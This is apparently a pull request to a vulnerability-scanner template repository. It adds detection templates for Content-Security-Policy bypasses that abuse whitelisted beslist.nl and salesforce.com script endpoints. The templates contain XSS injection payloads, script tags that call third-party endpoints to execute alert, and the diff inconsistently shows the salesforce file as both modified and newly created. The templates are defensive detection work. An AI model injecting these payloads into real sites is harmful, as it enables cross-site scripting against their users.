### PR TITLE
Add beslist

### DIFF
--- a/dast/vulnerabilities/xss/csp-bypass/beslist-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/beslist-csp-bypass.yaml
@@ -1,0 +1,54 @@
+id: beslist-csp-bypass
+
+info:
+  name: Content-Security-Policy Bypass - beslist.nl
+  author: Jaenact
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,beslist-api
+
+flow: http(1) && headless(1)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Content-Security-Policy"
+          - "beslist.nl"
+        condition: and
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{BaseURL}}"
+
+      - action: waitdialog
+        name: beslist_csp_xss
+        args:
+          max-duration: 5s
+
+    payloads:
+      injection:
+        - '<script src="https://ct.beslist.nl/ct_refresh?shopid=%22;%0a%0dalert(1);%20//%20"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "beslist_csp_xss == true"

--- a/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml
@@ -39,7 +39,7 @@ headless:
 
     payloads:
       injection:
-        - '<script src="https://omtr2.partners.salesforce.com"></script>'
+        - '<script src="https://omtr2.partners.salesforce.com/id?callback=alert"></script>'
 
     fuzzing:
       - part: query

--- a/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml
+++ b/dast/vulnerabilities/xss/csp-bypass/salesforce-csp-bypass.yaml
@@ -1,0 +1,54 @@
+id: salesforce-csp-bypass
+
+info:
+  name: Content-Security-Policy Bypass - salesforce
+  author: Jaenact
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,salesforce-api
+
+flow: http(1) && headless(1)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "Content-Security-Policy"
+          - "salesforce.com"
+        condition: and
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{BaseURL}}"
+
+      - action: waitdialog
+        name: salesforce_csp_xss
+        args:
+          max-duration: 5s
+
+    payloads:
+      injection:
+        - '<script src="https://omtr2.partners.salesforce.com"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "salesforce_csp_xss == true"


### PR DESCRIPTION
# Pull Request: Beslist.nl CSP Bypass Template

**This pull request introduces a new Nuclei template to detect a Content-Security-Policy (CSP) bypass vulnerability via the `beslist.nl` domain.**

The template identifies misconfigurations where a web application's CSP whitelists `beslist.nl` (specifically `ct.beslist.nl`), which exposes a script endpoint. This can be exploited to execute arbitrary JavaScript if the target is vulnerable to HTML injection, leading to Cross-Site Scripting (XSS).

## References

- This template is based on the research and data provided by the [renniepak/CSPBypass](https://github.com/renniepak/CSPBypass) repository.  
- https://github.com/renniepak/CSPBypass/commit/d87c7f4e6bb9d3464fee8070598b8fed98465133

## Additional References

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)  
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)  
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)  
- [PD-Community Discord server](https://discord.gg/projectdiscovery)  
